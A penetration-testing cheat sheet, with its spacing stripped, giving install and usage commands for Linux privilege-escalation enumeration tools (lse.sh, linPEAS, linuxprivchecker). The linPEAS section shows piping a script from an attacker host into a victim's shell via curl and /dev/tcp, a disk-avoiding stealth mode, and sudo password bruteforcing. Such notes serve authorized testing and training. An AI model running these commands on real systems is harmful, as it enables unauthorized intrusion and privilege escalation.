# installwget"https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh"-Olse.shcurl"https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh"-olse.sh# usage# shows interesting information that should help you to privesc./lse.sh-l1# dump all the information it gathers about the system./lse.sh-l2
linPEAS
# installwget"https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh"-Olinpeas.sh# COMMANDS# Local network# On the Hostsudopython-mSimpleHTTPServer80# On the Victimcurl $ip/linpeas.sh|sh# Without curl# On the Hostsudonc-q5-lvnp80<linpeas.sh# On the Victimcat</dev/tcp/10.10.10.10/80|sh# USAGE#all checks - deeper system enumeration, but it takes longer to complete../linpeas.sh-a# superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
./linpeas.sh-s#Password - Pass a password that will be used with sudo -l and bruteforcing other users./linpeas.sh-P
linuxprivchecker
# INSTALLwgethttps://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py# python 2.6/2.7pythonlinuxprivchecker.py-w-olinuxprivchecker.log# python 3.xpipinstalllinuxprivchecker# USAGElinuxprivchecker-w-olinuxprivchecker.log# or python3-mlinuxprivchecker-w-olinuxprivchecker.log
# enumerationrunenumerate# to enumerate the whole serverrunenumerate.file.caps# to enumerate linux capabilitiesrunenumerate.file.suid# to enumerate suid files